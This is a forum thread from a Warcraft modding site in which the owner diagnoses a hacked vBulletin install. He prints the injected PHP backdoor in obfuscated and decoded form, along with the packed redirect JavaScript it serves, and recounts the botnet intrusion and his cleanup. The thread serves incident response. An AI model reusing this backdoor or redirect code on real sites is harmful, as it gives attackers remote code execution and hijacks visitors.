• 🏆 Texturing Contest #33 is OPEN! Contestants must re-texture a SD unit model found in-game (Warcraft 3 Classic), recreating the unit into a peaceful NPC version. 🔗Click here to enter!
  • It's time for the first HD Modeling Contest of 2024. Join the theme discussion for Hive's HD Modeling Contest #6! Click here to post your idea!

TinyURL Redirect

Status
Not open for further replies.
Level 22
Joined
Jul 25, 2009
Messages
3,091
Okay, so, this is pissing me off believe it or not. Every other time I try to come to the site, I get redirected to this site called "TinyURL" where they ask me to partake in a survey.

Is anyone else getting this? And is it going to stop any time soon?
 
Level 22
Joined
Jul 25, 2009
Messages
3,091
73558275.jpg
 
https://www.vbulletin.com/forum/sho...g-redirected-to-another-site-potential-script

basically. reset all cookies and clean your shit out.

i get the same shit if i access from google. everyone, go try it out.

i'll link ralle about this

PS: deleted all cookies and browsing history. still being redirected to the website when accessing through google search. problem most likely some sort of problem on hiveworkshop's part in regards to google search or google searches part in regards to vBulletin websites. most likely the former.
 
Last edited:
Level 29
Joined
Jul 29, 2007
Messages
5,174
That's what happens when you put trust in the scumbags that Google have become.
Every damn link that comes from any Google site is a redirect to the url you want, because silently grabbing data from the users is in the past, these days they can do it in broad day light and nobody gives a damn.

And yes, this is probably not actually related, but I want to rant about Google, since they are ruining the internet.
 
Level 22
Joined
Jul 25, 2009
Messages
3,091
That's what happens when you put trust in the scumbags that Google have become.
Every damn link that comes from any Google site is a redirect to the url you want, because silently grabbing data from the users is in the past, these days they can do it in broad day light and nobody gives a damn.

And yes, this is probably not actually related, but I want to rant about Google, since they are ruining the internet.

One word.

Chrome.

Kthx.
 

Ralle

Owner
Level 77
Joined
Oct 6, 2004
Messages
10,101
After some time of searching, I found this piece of code stored in the "pluginlist" row in the MySQL table called "datastore". What's weird is that it is not in the actual pluginlist table. So simply updating a plugin erased this junk.
PHP:
<?php
eval(CHR(36).CHR(120).CHR(61).CHR(39)[email protected](39).CHR(59).@base64_decode(aWYoaXNzZXQoJF9QT1NUWyR4XSkpZXZhbChiYXNlNjRfZGVjb2RlKHN0cl9yb3QxMygkX1BPU1RbJHhdKSkpO3Vuc2V0KCR4KTsNCmluaV9zZXQoJ2Rpc3BsYXlfZXJyb3JzJywwKTtpbmlfc2V0KCdsb2dfZXJyb3JzJywwKTsNCiRyPSFlbXB0eSgkX1NFUlZFUlsnSFRUUF9SRUZFUkVSJ10pID8gJF9TRVJWRVJbJ0hUVFBfUkVGRVJFUiddIDogZ2V0ZW52KCdIVFRQX1JFRkVSRVInKTsNCmlmKHN0cmxlbigkcik.chr(43).MTApDQp7DQoJJGlwPSRfU0VSVkVSWydSRU1PVEVfQUREUiddOyRobj1AZ2V0aG9zdGJ5YWRkcigkaXApOw0KCWlmKChzdHJwb3MoJGlwLCc2NS41NS4nKSE9PTApJiYoc3RycG9zKCRobiwnbXNuYm90Jyk9PT1mYWxzZSkpDQoJew0KCQkkcz1hcnJheSgnc2VhcmNoLmxpdmUuY29tJywnd3d3Lmdvb2dsZScsJ3NlYXJjaC55YWhvby5jb20nLCd3d3cuYmluZy5jb20nLCd5YW5kZXgucnUnLCdiYWlkdS5jb20nKTsNCgkJZm9yZWFjaCgkcyBhcyAkZSkNCgkJew0KCQkJaWYoKHN0cnBvcygkciwkZSkhPT1mYWxzZSkmJihlbXB0eSgkX0NPT0tJRVsnaXBicyddKSkpDQoJCQl7DQoJCQkJJGg9c3Vic3RyKEBtZDUoJF9TRVJWRVJbJ0hUVFBfSE9TVCddKSwwLDgpOw0KCQkJCWRpZSgiPGh0bWw.chr(43).PGhlYWQ.chr(43).PC9oZWFkPjxib2R5PjxzY3JpcHQgdHlwZT1cInRleHQvamF2YXNjcmlwdFwiPnZhciBpcGJzPSckaCc7Ii5zdHJfcmVwbGFjZSgnXFwnLCdcXFxcJyxnemluZmxhdGUoYmFzZTY0X2RlY29kZSgnWFZKL2I1c3dFUDBxTE5Ka1c5QTBDUVNhTWxhMWFicDF2OWZ1UDg2YkhNZEphQkpnaERSMG1PKytjN3FnYW9iRHorK2UzeDNTcVVleHB2DQpOZEtzc2tTMm51Q0VjNkswYzVNMWFycU9VbHF3dFY3Z3BFYjhRRkllZUs1cUxZcXR1MHBQSlVNTVpzU21Va1h3djIxaDFlM0pkRmtpNjY4eQ0KTGJqSmVpR0djelJhVTlHTEZ6MlMyejV5eDFmY2FhTUpuVFY0UjBDNVd2aFZUMDlPZXA4NXhuck40dmt6VmVQRGxoOVN4R3dIaTBpaVhYMnUNCkJtRmNWdGYrclluNFZDM3ZEd1JlL0hGSUc5VFpwUVJ2MG1mT0dNRFJoVFZ1ZFIzcmFScXIxMXB4YVRLcWNFcHNRMkJXMkRITElnekRsY2FKDQpwL0pmT0drbzBsb3JnRGx6Q0RLYXhCd2grWWRad09QUHhQN09FM1VtTllJSlVpZW9DVm9hZWc0QnF1VVBrQmNZckpCQzVOSXNPRWduZElISw0KNnZqaDRMZUVUaERsWXdONVJFNGowOEdEZ3hud0l2WlFlSlJKUVlhb2VIS2NwdVlZN1A5RkRpSTl4aHNRTHU0Y2ZoL0EzRjh3NFBQMXNWenMNCklUcXpmV012cGlmYVVzWE1ZaTduTk96ZDdEbmRtZldMaXh0cEdJQjl3MnJHdllzRVRrY1I3bHRvaUgzSDZ5dHdoODNvUVZGWEhBSFJHZjhXDQpmVkNGVWl2dUgyOTVBNFE5KzhSTGZyVjYvcWo1U3ZxOERUbFQvQ0dHTGM2R3FBRWZSTTN2TkZVSm5zQkJsWFYrNjFyb2FlZmhRRm5nZkl1Ng0KMEtUNE1lTXVPV0dlcFpKbmNibFpaSW4ySDAwZUJLSi9sVXlsYUVwajZhK29HdVBOd0QxSG1JM2I3dUc3Y3JESFIyTDdFdVNvT1JQdk85bmwNCm42T0g0YVIwbGZpMUtoMURmdVc5VGhuN2pZOTJCQ3V0dDhuWlNVYUp5cW5sTTNqUDBGJykpKS4iPC9zY3JpcHQ.chr(43).PC9ib2R5PjwvaHRtbD4iKTsNCgkJCX0NCgkJfQ0KCX0gDQp9));
?>
Expanded, it looks like this:
PHP:
<?php
$x='b7055d4eb32f722fafd0f5cd791f4cbf';
if(isset($_POST[$x]))
  eval(base64_decode(str_rot13($_POST[$x])));
unset($x);
ini_set('display_errors',0);
ini_set('log_errors',0);
$r=!empty($_SERVER['HTTP_REFERER']) ? $_SERVER['HTTP_REFERER'] : getenv('HTTP_REFERER');
if(strlen($r)>10)
{
	$ip=$_SERVER['REMOTE_ADDR'];
  $hn=@gethostbyaddr($ip);
	if((strpos($ip,'65.55.')!==0) && (strpos($hn,'msnbot')===false))
	{
		$s=array('search.live.com','www.google','search.yahoo.com','www.bing.com','yandex.ru','baidu.com');
		foreach($s as $e)
		{
			if((strpos($r,$e)!==false)&&(empty($_COOKIE['ipbs'])))
			{
				$h=substr(@md5($_SERVER['HTTP_HOST']),0,8);
				die("<html><head></head><body><script type=\"text/javascript\">var ipbs='$h';".str_replace('\\','\\\\',gzinflate(base64_decode('XVJ/b5swEP0qLNJkW9A0CQSaMla1abp1v9fuP86bHMdJaBJghDR0mO++c7qgaobDz++e3x3SqUexpv
NdKsskS2nuCEc6K0c5M1arqOUlqwtV7gpEb8QFIeeK5qLYqtu0pPJUMMZsSmUkXwv21h1e3JdFki668y
LbjJeiGGczRaU9GLFz2S2z5yx1fcaaMJnTV4R0C5WvhVT09Oep85xnrN4vkzVePDlh9SxGwHi0iiXX2u
BmFcVtf+rYn4VC3vDwRe/HFIG9TZpQRv0mfOGMDRhTVudR3raRqr11pxaTKqcEpsQ2BW2DHLIgzDlcaJ
p/JfOGko0lorgDlzCDKaxBwh+YdZwOPPxP7OE3UmNYIJUieoCVoaeg4BquUPkBcYrJBC5NIsOEgndIHK
6vjh4LeEThDlYwN5RE4j08GDgxnwIvZQeJRJQYaoeHKcpuYY7P9FDiI9xhsQLu4cfh/A3F8w4PP1sVzs
ITqzfWMvpifaUsXMYi7nNOzd7DndmfWLixtpGIB9w2rGvYsETkcR7ltoiH3H6ytwh83oQVFXHAHRGf8W
fVCFUivuH295A4Q9+8RLfrV6/qj5Svq8DTlT/CGGLc6GqAEfRM3vNFUJnsBBlXV+61roaefhQFngfIu6
0KT4MeMuOWGepZJncblZZIn2H00eBKJ/lUylaEpj6a+oGuPNwD1HmI3b7uG7crDHR2L7EuSoORPvO9nl
n6OH4aR0lfi1Kh1DfuW9Thn7jY92BCutt8nZSUaJyqnlM3jP0F')))."</script></body></html>");
			}
		}
	} 
}
?>
It creates a backdoor and also shows the following code whenever you visit the site from another site:
HTML:
<html><head></head><body><script type="text/javascript">var ipbs='f12f6227';eval(function(p,a,c,k,e,d){e=function(c){return(c<a?'':e(parseInt(c/a)))+((c=c%a)>35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\\b'+e(c)+'\\b','g'),k[c])}}return p}('m a=["\\A\\d\\b\\l\\c\\z\\d","\\j\\d\\b\\l\\c\\z\\d","\\w\\q\\d\\C\\g\\c\\n\\d\\j\\k","\\b\\e\\D\\B\\l\\J\\b\\n\\c\\i\\A","\\o\\e\\e\\G\\c\\d","\\k","\\w\\q\\g\\v\\b\\u\\k\\f","\\c\\g\\H\\j","\\E","\\r\\e\\o\\v\\b\\c\\e\\i","\\u\\b\\b\\g\\I\\f\\f\\b\\c\\i\\K\\R\\n\\r\\S\\T\\c\\i\\P\\e\\f"];M x(p,y){m h=N O();h[a[1]](h[a[0]]()+L);m s=a[2]+h[a[3]]();t[a[4]]=p+a[5]+y+s+a[6]};x(a[7],a[8]);t[a[9]]=a[F]+Q;',56,56,'||||||||||_0x19e6|x74|x69|x65|x6F|x2F|x70|_0x46a7x4|x6E|x73|x3D|x54|var|x72|x63|_0x46a7x2|x20|x6C|_0x46a7x5|document|x68|x61|x3B|ipbcc|_0x46a7x3|x6D|x67|x4D|x78|x47|x31|10|x6B|x62|x3A|x53|x79|86400000|function|new|Date|x66|ipbs|x75|x34|x2E'.split('|'),0,{}))</script></body></html>

I read that because vBSEO (a plugin we use on this site) includes a piece of JavaScript from the vbseo.com website, which was hacked and the JavaScript changed, most vBSEO customers were hacked as well because that script could easily be changed into a backdoor.
http://www.vbseo.com/f5/faqs-rogue-plugins-exploit-1-23-vbseo-patch-release-52862/
 

Ralle

Owner
Level 77
Joined
Oct 6, 2004
Messages
10,101
I did not believe there was a problem with the site when this happened, so I just removed the malicious code. Two days ago it came back and I didn't know. Ghan_04 sent me an email that a process on the server was using 70 mbit of traffic which is extreme. The process was called "s" and was not anything we had put there.
After investigating further we found a hidden folder in /tmp containing lots of useful utilities to bruteforce root passwords and find all cleartext passwords stored on the server.
We killed the process and started monitoring the server. We found that many processes of perl were running, each with an attached shell which means someone has access to the server and can send commands to it as they please.
I looked into the files that the hacker left and found one containing details to connect to an IRC server. This is often done when making a botnet, so the hacker can control the herd of bots from IRC. I sat there a while and thought to myself what would happen if I joined this channel. Maybe I would get instantly banned. Maybe the guy would try to hack me or be mean to me? I launched my IRC client and connected. In the channel was about 50 users with random short names like stealthh, stealthp and I had named myself stealthh because that's what the file had detailed.
I was idling in the channel while some guy was issuing a few commands. I clicked on his name to get more info, but then he somehow knew I was not a bot. We said hello and talked.
He told me about himself and we talked casually for a while. I told him about how he had compromised my server.
Later he told me to update my software.
Ghan_04 killed all perl processes and we removed the files from the hacker.
The hacker said that now he was out.
I updated vBSEO and we were sure everything was good.
The next morning I signed onto the server and saw that there were new perl processes running and I immediately killed those. Looked at the forum and that exploit code was again in the datastore. I removed it killed the processes and continued to monitor the server processes.
Nothing else really happened that day.
I changed /tmp, /var/tmp and /dev/shm to be nosuid and noexec, so programs cannot be launched from these folders.
Today, the first thing I do is check what's running on the server and AGAIN I see these perl processes.
I decide that perl is out and run "watch killall -9 perl" which kills any perl process every 2 seconds. This is of course a temporary fix as when he realizes what is happening, he can start running some other kind of program or bundle his own version of perl named lolcaps.
I write a small script to monitor processes and as soon as something unexpected pops up, it sends me an email.
I also found a new thing in my /tmp folder. A sourecode for a kernel exploit. I found a link to a blog entry and read that it required a more modern version of the linux kernel than the one I am running, so I guess the exploiting failed. This was very serious though as if he had exploited succesfully I can't be certain that I have removed his stuff, but as long as he resides in a less privileged user, I can control things.
I also Google some more to see if I missed something. Am I completely up to date? I found that I am running an old version vbseo_sitemap which creates sitemaps that Google uses to index the site better. I updated and double checked that nothing bad is on the system.
Nothing has happened since, but the hacker is not in his IRC channel, so it's possible nothing happens when he is away, but I will continue to monitor the server closely.
 
Level 22
Joined
Jul 25, 2009
Messages
3,091
I did not believe there was a problem with the site when this happened, so I just removed the malicious code. Two days ago it came back and I didn't know. Ghan_04 sent me an email that a process on the server was using 70 mbit of traffic which is extreme. The process was called "s" and was not anything we had put there.
After investigating further we found a hidden folder in /tmp containing lots of useful utilities to bruteforce root passwords and find all cleartext passwords stored on the server.
We killed the process and started monitoring the server. We found that many processes of perl were running, each with an attached shell which means someone has access to the server and can send commands to it as they please.
I looked into the files that the hacker left and found one containing details to connect to an IRC server. This is often done when making a botnet, so the hacker can control the herd of bots from IRC. I sat there a while and thought to myself what would happen if I joined this channel. Maybe I would get instantly banned. Maybe the guy would try to hack me or be mean to me? I launched my IRC client and connected. In the channel was about 50 users with random short names like stealthh, stealthp and I had named myself stealthh because that's what the file had detailed.
I was idling in the channel while some guy was issuing a few commands. I clicked on his name to get more info, but then he somehow knew I was not a bot. We said hello and talked.
We told me about himself and we talked casually for a while. I told him about how he had compromised my server.
Later he told me to update my software.
Ghan_04 killed all perl processes and we removed the files from the hacker.
The hacker said that now he was out.
I updated vBSEO and we were sure everything was good.
The next morning I signed onto the server and saw that there were new perl processes running and I immediately killed those. Looked at the forum and that exploit code was again in the datastore. I removed it killed the processes and continued to monitor the server processes.
Nothing else really happened that day.
I changed /tmp, /var/tmp and /dev/shm to be nosuid and noexec, so programs cannot be launched from these folders.
Today, the first thing I do is check what's running on the server and AGAIN I see these perl processes.
I decide that perl is out and run "watch killall -9 perl" which kills any perl process every 2 seconds. This is of course a temporary fix as when he realizes what is happening, he can start running some other kind of program or bundle his own version of perl named lolcaps.
I write a small script to monitor processes and as soon as something unexpected pops up, it sends me an email.
I also Google some more to see if I missed something. Am I completely up to date? I found that I am running an old version vbseo_sitemap which creates sitemaps that Google uses to index the site better. I updated and double checked that nothing bad is on the system.
Nothing has happened since, but the hacker is not in his IRC channel, so it's possible nothing happens when he is away, but I will continue to monitor the server closely.

That is extremely weird that he just talked to haha.
 
Level 7
Joined
Jul 1, 2008
Messages
1,025
wow Ralle that makes for an interesting read, kinda cool how you entered his "lair" posing as one of his bot minions, I have to wonder what exactly he gains from hacking this site though?

No credit card or personal details are stored on here so it's not like he can steal from us, is he just being an asshole?
 
Level 16
Joined
Jul 4, 2008
Messages
1,106
wow Ralle that makes for an interesting read, kinda cool how you entered his "lair" posing as one of his bot minions, I have to wonder what exactly he gains from hacking this site though?

No credit card or personal details are stored on here so it's not like he can steal from us, is he just being an asshole?

It seems to me that he wanted Ralle to notice vulnerabilities on the server to me. It never did any harm except seed the botnet, by my reading.
 
Level 22
Joined
Feb 3, 2009
Messages
3,292
wow Ralle that makes for an interesting read, kinda cool how you entered his "lair" posing as one of his bot minions, I have to wonder what exactly he gains from hacking this site though?

No credit card or personal details are stored on here so it's not like he can steal from us, is he just being an asshole?

Let's assume this site is hosted on a VPS with 1gbps connection, still wondering why anyone would want it for their botnet?
 

Dr Super Good

Spell Reviewer
Level 63
Joined
Jan 18, 2005
Messages
27,180
It was clear the hacker was attempting to appear helpful with removing his hacks to place the server owner in a false sense of security so that he will not check again after he immediately rehacks.

It might be a good idea to reinstall the server OS at some stage. It is possible that it has been compromised in some way (discretely damaged) during the infection. Another idea would be to run major server processes with their own user (permission group) so that any security holes in such processes only allow very limited access.

Who said Unix kernals do not have viruses hehe.
 

Ralle

Owner
Level 77
Joined
Oct 6, 2004
Messages
10,101
Let's assume this site is hosted on a VPS with 1gbps connection, still wondering why anyone would want it for their botnet?

It's hosted on a 8 GB VM with 4 cores which is running on a 32 GB dedicated server with 4x 10,000 RPM drives in RAID 10, but performance of the server does not really matter in a botnet as even an old computer can contribute with a significant amount of traffic in a herd of bots.
 
Level 14
Joined
Mar 23, 2011
Messages
1,436
It's hosted on a 8 GB VM with 4 cores which is running on a 32 GB dedicated server with 4x 10,000 RPM drives in RAID 10, but performance of the server does not really matter in a botnet as even an old computer can contribute with a significant amount of traffic in a herd of bots.

Maybe we can have a different thread for this? I see no relevance except for both of them (bots and tinyurl4 redirect) are considered somewhat as a malware

anyway here are some bots I found lurking threads
http://www.hiveworkshop.com/forums/members/peterjackson/
http://www.hiveworkshop.com/forums/members/pollardmark52/
 
Status
Not open for further replies.
Top